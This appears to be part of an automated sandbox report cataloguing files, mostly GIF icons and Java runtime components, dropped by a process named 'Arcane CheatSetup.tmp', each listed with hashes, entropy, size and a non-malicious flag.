                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 31 x 32
                                Category:dropped
                                Size (bytes):165
                                Entropy (8bit):6.347455736310776
                                Encrypted:false
                                SSDEEP:3:CruuU/XExlHrBwM7Qt/wCvTjh2Azr8ptBNKtWwUzJ7Ful5u44JyYChWn:KP0URwMcx3UAzADBNwUlBul5TLYMWn
                                MD5:89CDF623E11AAF0407328FD3ADA32C07
                                SHA1:AE813939F9A52E7B59927F531CE8757636FF8082
                                SHA-256:13C783ACD580DF27207DABCCB10B3F0C14674560A23943AC7233DF7F72D4E49D
                                SHA-512:2A35311D7DB5466697D7284DE75BABEE9BD0F0E2B20543332FCB6813F06DEBF2457A9C0CF569449C37F371BFEB0D81FB0D219E82B9A77ACC6BAFA07499EAC2F7
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 32 x 32
                                Category:dropped
                                Size (bytes):153
                                Entropy (8bit):6.2813106319833665
                                Encrypted:false
                                SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 31 x 32
                                Category:dropped
                                Size (bytes):168
                                Entropy (8bit):6.465243369905675
                                Encrypted:false
                                SSDEEP:3:CruuU/XExlHrZauowM7Qt/wCvTjh2Azr8ptBNKtWwUzJZmQYRNbC1MIQvEn:KP0UpawMcx3UAzADBNwUlZaCzn
                                MD5:694A59EFDE0648F49FA448A46C4D8948
                                SHA1:4B3843CBD4F112A90D112A37957684C843D68E83
                                SHA-256:485CBE5C5144CFCD13CC6D701CDAB96E4A6F8660CBC70A0A58F1B7916BE64198
                                SHA-512:CF2DFD500AF64B63CC080151BC5B9DE59EDB99F0E31676056CF1AFBC9D6E2E5AF18DC40E393E043BBBBCB26F42D425AF71CCE6D283E838E67E61D826ED6ECD27
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 32 x 32
                                Category:dropped
                                Size (bytes):153
                                Entropy (8bit):6.2813106319833665
                                Encrypted:false
                                SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 31 x 32
                                Category:dropped
                                Size (bytes):147
                                Entropy (8bit):6.147949937659802
                                Encrypted:false
                                SSDEEP:3:CruuU/XExlHrSauZKwM7Qt/wCvTjh2Azr8ptBNKtWXOh6WoXt2W:KP0UvEKwMcx3UAzADBNXOh6h9p
                                MD5:CC8DD9AB7DDF6EFA2F3B8BCFA31115C0
                                SHA1:1333F489AC0506D7DC98656A515FEEB6E87E27F9
                                SHA-256:12CFCE05229DBA939CE13375D65CA7D303CE87851AE15539C02F11D1DC824338
                                SHA-512:9857B329ACD0DB45EA8C16E945B4CFA6DF9445A1EF457E4B8B40740720E8C658301FC3AB8BDD242B7697A65AE1436FD444F1968BD29DA6A89725CDDE1DE387B8
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 32 x 32
                                Category:dropped
                                Size (bytes):153
                                Entropy (8bit):6.2813106319833665
                                Encrypted:false
                                SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8602
                                Entropy (8bit):5.204166069367786
                                Encrypted:false
                                SSDEEP:192:j1kfcymkDvxeMmKg5GQEK2TtllXinSV29OHPQT:hhymk/QGT7YT
                                MD5:B8DD8953B143685B5E91ABEB13FF24F0
                                SHA1:B5CEB39061FCE39BB9D7A0176049A6E2600C419C
                                SHA-256:3D49B3F2761C70F15057DA48ABE35A59B43D91FA4922BE137C0022851B1CA272
                                SHA-512:C9CD0EB1BA203C170F8196CBAB1AAA067BCC86F2E52D0BAF979AAD370EDF9F773E19F430777A5A1C66EFE1EC3046F9BC82165ACCE3E3D1B8AE5879BD92F09C90
                                Malicious:false
                                Preview:#..# This file describes mapping information between Windows and Java..# time zones...# Format: Each line should include a colon separated fields of Windows..# time zone registry key, time zone mapID, locale (which is most..# likely used in the time zone), and Java time zone ID. Blank lines..# and lines that start with '#' are ignored. Data lines must be sorted..# by mapID (ASCII order)...#..# NOTE..# This table format is not a public interface of any Java..# platforms. No applications should depend on this file in any form...#..# This table has been generated by a program and should not be edited..# manually...#..Romance:-1,64::Europe/Paris:..Romance Standard Time:-1,64::Europe/Paris:..Warsaw:-1,65::Europe/Warsaw:..Central Europe:-1,66::Europe/Prague:..Central Europe Standard Time:-1,66::Europe/Prague:..Prague Bratislava:-1,66::Europe/Prague:..W. Central Africa Standard Time:-1,66:AO:Africa/Luanda:..FLE:-1,67:FI:Europe/Helsinki:..FLE Standard Time:-1,67:FI:E
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):5824
                                Entropy (8bit):5.074440246603207
                                Encrypted:false
                                SSDEEP:96:6M5VfH+uEMmPDkZeujdJfZUB8BB/+PhPXsOQ71GAXf5lZuU1EbWF7Ycx/AQ12a8T:6M6p4ZeWd1ZUB8BBGPhPXsOQ71GAXBly
                                MD5:95AE170D90764B3F5E68C72E8C518DDC
                                SHA1:1939B699D16A5DB3E3F905466222099D7C29285A
                                SHA-256:A2B31E9CBCEAB296A5E1CF056EFD953CED23B888CD929B0BBE6EB6B53D2BF861
                                SHA-512:87E970BEAC8141C757D622FC8B6D84FE173EA4B134AFD8E2F979714C1110C3D92F3CE5F2B9DC74804DD37D13AB2A0EDF0FCA242F61CF8ED065AE81B7331F8816
                                Malicious:false
                                Preview:#sun.net.www MIME content-types table..#..# Property fields:..#..# <description> ::= 'description' '=' <descriptive string>..# <extensions> ::= 'file_extensions' '=' <comma-delimited list, include '.'>..# <image> ::= 'icon' '=' <filename of icon image>..# <action> ::= 'browser' | 'application' | 'save' | 'unknown'..# <application> ::= 'application' '=' <command line template>..#....#..# The "we don't know anything about this data" type(s)...# Used internally to mark unrecognized types...#..content/unknown: description=Unknown Content..unknown/unknown: description=Unknown Data Type....#..# The template we should use for temporary files when launching an application..# to view a document of given type...#..temp.file.template: c:\\temp\\%s....#..# The "real" types...#..application/octet-stream: \...description=Generic Binary Stream;\...file_extensions=.saveme,.dump,.hqx,.arc,.obj,.lib,.bin,.exe,.zip,.gz....application/oda: \...description=ODA Document;\...file_extens
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2126
                                Entropy (8bit):4.970874214349507
                                Encrypted:false
                                SSDEEP:48:EE796OfeCiuG2M5tP5iMmC5KOAY2HQii+r4IzteKk:EnEiuGJbP5lmC5KOA3HQii+EIz8Kk
                                MD5:91AA6EA7320140F30379F758D626E59D
                                SHA1:3BE2FEBE28723B1033CCDAA110EAF59BBD6D1F96
                                SHA-256:4AF21954CDF398D1EAE795B6886CA2581DAC9F2F1D41C98C6ED9B5DBC3E3C1D4
                                SHA-512:03428803F1D644D89EB4C0DCBDEA93ACAAC366D35FC1356CCABF83473F4FEF7924EDB771E44C721103CEC22D94A179F092D1BFD1C0A62130F076EB82A826D7CB
                                Malicious:false
                                Preview:% VERSION 2..% WARNING: this file is auto-generated; do not edit..% UNSUPPORTED: this file and its format may change and/or..% may be removed in a future release..# charsets.jar..sun/nio..sun/awt..# jce.jar..javax/crypto..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# jfr.jar..oracle/jrockit/..jdk/jfr..com/oracle/jrockit/..! jsse.jar..sun/security..com/sun/net/..! management-agent.jar..@ resources.jar..com/sun/java/util/jar/pack/..META-INF/services/sun.util.spi.XmlPropertiesProvider..META-INF/services/javax.print.PrintServiceLookup..com/sun/corba/..META-INF/services/javax.sound.midi.spi.SoundbankReader..sun/print..META-INF/services/javax.sound.midi.spi.MidiFileReader..META-INF/services/sun.java2d.cmm.CMMServiceProvider..javax/swing..META-INF/services/javax.sound.sampled.spi.AudioFileReader..META-INF/services/javax.sound.midi.spi.MidiDeviceProvider..sun/net..META-INF/services/javax.sound.sampled.spi.AudioFileWriter..com/sun/imageio/..META-INF/services/sun.java2d.pipe.Ren
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):63602929
                                Entropy (8bit):5.963369315504544
                                Encrypted:false
                                SSDEEP:786432:WyfysbZyGp7g85KKwcl0HeJgyll3LTjjA:F0GZTjjA
                                MD5:EDB5B5B3EF4565E4E86BFFE647FB1AA2
                                SHA1:11F5B1B2D729309059B1BD1FE2922251D9451D5F
                                SHA-256:D00351BD39DE7DBF9E9FDBB9EE1FD82189189F9BC82E988B58E1E950D1D4BDC8
                                SHA-512:05E7F9ED915610B70664EB7CB68F3F0BBA5BD5CF208BBDB54007DA5FF6311A6DDBBF057E0DF5A346C9042333C29E5C766B2C0A686628F8655C2E75061A9179C1
                                Malicious:false
                                Preview:PK...........H................META-INF/....PK...........H.5.%...%.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_101..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_07 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....Name: javax/swing/JCheckBoxMenuItem.class..Java-Bean: True....Name: javax/swing/JDialog.class..Java-Bean: True....Name: javax/swing/JSlider.class..Java-Bean: True....Name: javax/swing/JTextField.class..Java-Bean: True....Name: javax/swing/JTextPane.class..Java-Bean: True....Name: javax/swing/JTextArea.class..Java-Bean: True....Name: javax/swing/JList.class..Java-Bean: True....Name: javax/swing/JFormattedTextField.class..Java-Bean: True....Name: javax/swing/JApplet.class..Java-Bean: True....Name: javax/swing/JSpinner.class..Java-Bean: True....Name: javax/swing/JLabel.class..Java-Bean
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):633957
                                Entropy (8bit):6.018176262975427
                                Encrypted:false
                                SSDEEP:6144:ABoQeW0HKwYGORU+ehqEmke1WEAibVR0GPs4j8GgflXhuuMAjYDTj:Uo40WGdNmpb3DP75
                                MD5:FD1434C81219C385F30B07E33CEF9F30
                                SHA1:0B5EE897864C8605EF69F66DFE1E15729CFCBC59
                                SHA-256:BC3A736E08E68ACE28C68B0621DCCFB76C1063BD28D7BD8FCE7B20E7B7526CC5
                                SHA-512:9A778A3843744F1FABAD960AA22880D37C30B1CAB29E123170D853C9469DC54A81E81A9070E1DE1BF63BA527C332BB2B1F1D872907F3BDCE33A6898A02FEF22D
                                Malicious:false
                                Preview:PK........u..H................META-INF/....PK........u..H.s0>...>.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_101..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_07 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK...........H....E...E...+...com/sun/net/ssl/internal/ssl/Provider.class.......4...............................serialVersionUID...J...ConstantValue.,..c".J-...<init>...()V...Code...LineNumberTable...(Ljava/security/Provider;)V...(Ljava/lang/String;)V...isFIPS...()Z...install...SourceFile...Provider.java......................%com/sun/net/ssl/internal/ssl/Provider...sun/security/ssl/SunJSSE.1.......................................!........*...................)...*............."........*+......................./............."........*+...................3...4.)........................
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1249
                                Entropy (8bit):4.735634480139973
                                Encrypted:false
                                SSDEEP:12:AJx/wzjJQO1YfK4pPq8Ul6GyGLCKDJ9w5lAu9aEVjEcGuc8X3A0LlmPOiMA0L9UV:w/61sppNUl6GbLCOMlmEOucA3e2s/WW
                                MD5:BB63293B1207CB8608C5FBE089A1B06D
                                SHA1:96A0FA723AF939C22AE25B164771319D82BC033B
                                SHA-256:633015AD63728DFE7A51BF26E55B766DD3E935F1FCCCFFA8054BF6E158EA89B2
                                SHA-512:0042DEBE4A77DA997A75A294A0C48D19AED258EEB3CD723FD305037DF11F0A5073A92CC54967B8B541E1AFC912F36481D0B0F68477B8156E52E15093722B7C32
                                Malicious:false
                                Preview:############################################################..# Sound Configuration File..############################################################..#..# This properties file is used to specify default service..# providers for javax.sound.midi.MidiSystem and..# javax.sound.sampled.AudioSystem...#..# The following keys are recognized by MidiSystem methods:..#..# javax.sound.midi.Receiver..# javax.sound.midi.Sequencer..# javax.sound.midi.Synthesizer..# javax.sound.midi.Transmitter..#..# The following keys are recognized by AudioSystem methods:..#..# javax.sound.sampled.Clip..# javax.sound.sampled.Port..# javax.sound.sampled.SourceDataLine..# javax.sound.sampled.TargetDataLine..#..# The values specify the full class name of the service..# provider, or the device name...#..# See the class descriptions for details...#..# Example 1:..# Use MyDeviceProvider as default for SourceDataLines:..# javax.sound.sampled.SourceDataLine=com.xyz.MyDeviceProvider..#..# Example 2:..# Speci
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1438
                                Entropy (8bit):5.214662998532387
                                Encrypted:false
                                SSDEEP:24:QVDpdQYHLOVhl86bePCkHUMCLC9TFcgg+DR+Oby:MQ4LOVh2WGfUMCLC9Zcgg2Ru
                                MD5:92BA2D87915E6F7F58D43344DF07E1A6
                                SHA1:872BC54E53377AAC7C7616196BCCE1DB6A3F0477
                                SHA-256:68F0CF30429A42A6FE78B1DE91970E5C78FD03D1599BEB080C1C196D5C59E4C0
                                SHA-512:A964E2CEB4D601FAF28ECF13FB11777B70708C21CF9EA23721E462B6E911051108B8A42EBF6447FA49CB61D7FA2D79475F50EE791F1121616371E2B02FAB71B6
                                Malicious:false
                                Preview:# Copyright (c) 2005, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....#..# Japanese imperial calendar..#..# Meiji since 1868-01-01 00:00:00 local time (Gregorian)..# Taisho since 1912-07-30 00:00:00 local time (Gregorian)..# Showa since 1926-12-25 00:00:00 local time (Gregorian)..# Heisei since 1989-01-08 00:00:00 local time (Gregorian)..calendar.japanese.type: LocalGregorianCalendar..calendar.japanese.eras: \...name=Meiji,abbr=M,since=-3218832000000; \...name=Taisho,abbr=T,since=-1812153600000; \...name=Showa,abbr=S,since=-1357603200000; \...name=Heisei,abbr=H,since=600220800000....#..# Taiwanese calendar..# Minguo since 1911-01-01 00:00:00 local time (Gregorian)..calendar.taiwanese.type: LocalGregorianCalendar..calendar.taiwanese.eras: \...name=MinGuo,since=-1830384000000....#..# Thai Buddhist calendar..# Buddhist Era since -5
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):1012097
                                Entropy (8bit):7.896417877823185
                                Encrypted:false
                                SSDEEP:24576:q7jNpf26MPAMSL/wxSz2ijt2eejo+oV3vv:6NVZEaL4xSljt2eHNV3
                                MD5:54EF6C22FAAAE5850091031763078D37
                                SHA1:11D40B78BB606E245CB5E17C6DDB08193A34B40E
                                SHA-256:654B033B1DC315EB9806F0D35ABAF3F25064AC806292ACB2BD818F6B2DF2AD07
                                SHA-512:10998B6508D5571E1ECE2001C6E561169D3DBD7580A3DE439067D1195FBE85E6BD1729A0874E306234391AF963E1B062050276E1AC0E9C9FA289711738B41B31
                                Malicious:false
                                Preview:PK........!..H................META-INF/....PK........ ..H...7Z...e.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%...y...R.KRSt.*...L....u....4....sR......K..5y.x..PK...........H................com/PK...........H................com/sun/PK...........H................com/sun/deploy/PK...........H................com/sun/deploy/uitoolkit/PK...........H................com/sun/deploy/uitoolkit/impl/PK........!..H............"...com/sun/deploy/uitoolkit/impl/awt/PK...........H............#...com/sun/deploy/uitoolkit/impl/text/PK...........H................com/sun/deploy/uitoolkit/ui/PK...........H................com/sun/java/PK...........H................com/sun/java/browser/PK...........H................com/sun/java/browser/plugin2/PK...........H............)...com/sun/java/browser/plugin2/liveconnect/PK...........H............,...com/sun/java/browser/plugin2/liveconnect/v1/PK...........H................netscape/PK...........H................netscape/javascript/PK.........
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):560553
                                Entropy (8bit):5.781566946934384
                                Encrypted:false
                                SSDEEP:12288:G5l+qU67FYWg+YWgYWeoXqgYSq8eh2f/m5NwaHkSIJHvWQ6Q7ooMcgH5lY7TQ5cD:G5l+qU67FYWg+YWgYWeoXqgYSq8eh2f3
                                MD5:CCB395235C35C3ACBA592B21138CC6AB
                                SHA1:29C463AA4780F13E77FB08CC151F68CA2B2958D5
                                SHA-256:27AD8EA5192EE2D91BA7A0EACE9843CB19F5E145259466158C2F48C971EB7B8F
                                SHA-512:D4C330741387F62DD6E52B41167CB11ABD8615675FE7E1C14AE05A52F87A348CBC64B56866AE313B2906B33CE98BE73681F769A4A54F6FE9A7D056F88CF9A4E1
                                Malicious:false
                                Preview:PK........t..H................META-INF/....PK........t..H.s0>...>.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_101..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_07 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK...........HB.<>^...^...8...com/oracle/jrockit/jfr/client/EventSettingsBuilder.class.......4....5.f..g....f..4.h..4.i..j....f..4.k..l....m..4.n..o....f..4.p..q..r....f....s....t....u....v..w..x..y....z..{....|....}....~.................................#.........................)...................................................eventDefaultSets...Ljava/util/ArrayList;...Signature..DLjava/util/ArrayList<Loracle/jrockit/jfr/settings/EventDefaultSet;>;...settings..ALjava/util/ArrayList<Loracle/jrockit/jfr/settings/EventSetting;>;...eventDescriptorType..2Loracle/jrockit/jfr/openmbean/
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2514
                                Entropy (8bit):4.525846572478507
                                Encrypted:false
                                SSDEEP:48:/GXieQT8cg6ZGBjn4stbaWUwO61xFMxO9:OXieW8nBjn4x613Mw9
                                MD5:0AA5D5EFDB4F2B92BEBBEB4160AA808B
                                SHA1:C6F1B311A4D0790AF8C16C1CA9599D043BA99E90
                                SHA-256:A3148336160EA7EF451052D1F435F7C9D96EEB738105AC730358EDADA5BD45A2
                                SHA-512:A52C2B784CF0B01A2AF3066F4BB8E7FD890A86CFD82359A22266341942A25333D4C63BA2C02AA43ADE872357FC9C8BBC60D311B2AF2AD2634D60377A2294AFDD
                                Malicious:false
                                Preview:############################################################..# .Default Logging Configuration File..#..# You can use a different file by specifying a filename..# with the java.util.logging.config.file system property. ..# For example java -Djava.util.logging.config.file=myfile..############################################################....############################################################..# .Global properties..############################################################....# "handlers" specifies a comma separated list of log Handler ..# classes. These handlers will be installed during VM startup...# Note that these classes must be on the system classpath...# By default we only configure a ConsoleHandler, which will only..# show messages at the INFO and above levels...handlers= java.util.logging.ConsoleHandler....# To also add the FileHandler, use the following line instead...#handlers= java.util.logging.FileHandler, java.util.logging.ConsoleHandler....# Default global
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):114950
                                Entropy (8bit):7.912507028584016
                                Encrypted:false
                                SSDEEP:1536:5sNJO+ylt6se6sgU0w/XzGYWuSy15DudYLSfaxwpt5g1naZEqwoJ8sYcF+z/VSG8:aj8GHXZSy1pudYLdQe1ATtKVS+ws9O
                                MD5:A39F61D6ED2585519D7AF1E2EA029F59
                                SHA1:52515AC6DEAB634F3495FD724DEA643EE442B8FD
                                SHA-256:60724D9E372FBE42759349A06D3426380CA2B9162FA01EB2C3587A58A34AD7E0
                                SHA-512:AC2E9AB749F5365BE0FB8EBD321E8F231D22EAE396053745F047FCBCCF8D3DE2F737D3C37A52C715ADDFBDBD18F14809E8B37B382B018B58A76E063EFBA96948
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Algol 68 source, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4312
                                Entropy (8bit):4.756104846669624
                                Encrypted:false
                                SSDEEP:96:6VprYJmprYJD9Y3t3qFKPG7hLxVJgdTsfbFfcwQoPv:6HrsursD9Y3t36KPG7HyoBQoX
                                MD5:AD91D69A4129D31D72FBE288FF967943
                                SHA1:CB510AFCDBECEA3538C3F841C0440194573DBB65
                                SHA-256:235A50D958FAEDDE808D071705A6D603F97611F568EEC40D7444984B984A4B18
                                SHA-512:600BEE4676D26E2CE5B9171582540021509A4D7888C9C7BADC14F0FAD07007E4CE2B4C007A8EB15BD0D977722B8B34442012EA972FFBD72797475A56CDFD86EE
                                Malicious:false
                                Preview:Copyright (c) 2003, 2005, Oracle and/or its affiliates. All rights reserved.....Redistribution and use in source and binary forms, with or without..modification, are permitted provided that the following conditions..are met:.... - Redistributions of source code must retain the above copyright.. notice, this list of conditions and the following disclaimer..... - Redistributions in binary form must reproduce the above copyright.. notice, this list of conditions and the following disclaimer in the.. documentation and/or other materials provided with the distribution..... - Neither the name of Oracle nor the names of its.. contributors may be used to endorse or promote products derived.. from this software without specific prior written permission.....THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS..IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,..THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR..PURP
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):58
                                Entropy (8bit):4.4779965120705425
                                Encrypted:false
                                SSDEEP:3:CEBqRM9LTAGQdLV6ETEBqRM9LHQIuHPy:CEAsnAbLlszQdy
                                MD5:3C2B9CCAAD3D986E5874E8C0F82C37CF
                                SHA1:D1DDA4A2D5D37249C8878437DBF36C6AE61C33D1
                                SHA-256:D5BCD7D43E383D33B904CFF6C80ACE359DBE2CE2796E51E9743358BD650E4198
                                SHA-512:4350CCA847D214479C6AE430EB71EE98A220EA10EC175D0AB317A8B43ABC9B4054E41D0FF383F26D593DE825F761FB93704E37292831900F31E5E38167A41BAB
                                Malicious:false
                                Preview:javafx.runtime.version=8.0.101..javafx.runtime.build=b13..
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):2282861
                                Entropy (8bit):7.951223313727943
                                Encrypted:false
                                SSDEEP:49152:ABSxAmHHJwEu4l3Dyz7oQHeNHJJ2aAvfZc:ABEtHHaEuI3Dy3oQH2pFAvW
                                MD5:2388C4C8D5F95E0379A8997C7C2492F4
                                SHA1:906BF87EB1D8881ABADBF93A3C4BBA7887CA2A01
                                SHA-256:A1FD508EACF76645EB0885B243B5DD14239F1E039E8B53ED038226DF91A30539
                                SHA-512:2CCE11A5F97DF842964B55408FCF1EC84C0CD561E664ABA3A51275EAFE59D7C920FCFD954C527DA4D53ACB191200CC64BF8150A33BCB9B038F36ADB2CC69B1A1
                                Malicious:false
                                Preview:PK...........H................META-INF/....PK...........H...7Z...e.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%...y...R.KRSt.*...L....u....4....sR......K..5y.x..PK...........H................com/PK...........H................com/oracle/PK...........H................com/oracle/deploy/PK...........H................com/oracle/deploy/update/PK...........H................com/sun/PK...........H................com/sun/applet2/PK...........H................com/sun/applet2/preloader/PK...........H............ ...com/sun/applet2/preloader/event/PK...........H................com/sun/deploy/PK...........H................com/sun/deploy/appcontext/PK...........H................com/sun/deploy/association/PK...........H............#...com/sun/deploy/association/utility/PK...........H................com/sun/deploy/cache/PK...........H................com/sun/deploy/config/PK...........H................com/sun/deploy/jardiff/PK...........H................com/sun/deploy/model/PK.....
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):10716
                                Entropy (8bit):5.016037435830914
                                Encrypted:false
                                SSDEEP:192:Jp22HdiEUEdWUcPeJ7fbdHmcbiLMWNDyZcy57ha1xh3qvfRdIdyJkW:u2HdiEUEdGY1gbD9TKdIdyJkW
                                MD5:66B3E6770C291FE8CD3240FFBB00DC47
                                SHA1:88CE9D723A2D4A07FD2032A8B4A742FE323EEC8F
                                SHA-256:7EA6E05D3B8B51D03C3D6548E709C220541DF0F1AEE2E69B9101C9F051F7C17A
                                SHA-512:D1B99AA011568AFFA415758C986B427588AE87FE5EB7FC52D519F7167AD46BBFF8B62799F14D8DBC7C55DEB6FF7259445D6E8882CC781D61206ED1B79B688745
                                Malicious:false
                                Preview:#..#..# Copyright (c) 1999, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....#..#.PostScript printer property file for Java 2D printing...#..# WARNING: This is an internal implementation file, not a public file...# Any customisation or reliance on the existence of this file and its..# contents or syntax is discouraged and unsupported...# It may be incompatibly changed or removed without any notice...#..#..font.num=35..#..# Legacy logical font family names and logical font aliases should all..# map to the primary logical font names...#..serif=serif..times=serif..timesroman=serif..sansserif=sansserif..helvetica=sansserif..dialog=sansserif..dialoginput=monospaced..monospaced=monospaced..courier=monospaced..#..# Next, physical fonts which can be safely mapped to standard postscript fonts..# These keys generally map to a value which is the same as the key, so
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):84355
                                Entropy (8bit):4.927199323446014
                                Encrypted:false
                                SSDEEP:1536:4X/nxfn5rxLyMznYolTzlff5OK3COHoHNG5rb/cxNwmCX1g86K2oWdAqNqc+KMjD:qxn5rxLyMzbf5OK3CJNG51g86A
                                MD5:7FC71A62D85CCF12996680A4080AA44E
                                SHA1:199DCCAA94E9129A3649A09F8667B552803E1D0E
                                SHA-256:01FE24232D0DBEFE339F88C44A3FD3D99FF0E17AE03926CCF90B835332F5F89C
                                SHA-512:B0B9B486223CF79CCF9346AAF5C1CA0F9588247A00C826AA9F3D366B7E2EF905AF4D179787DCB02B32870500FD63899538CF6FAFCDD9B573799B255F658CEB1D
                                Malicious:false
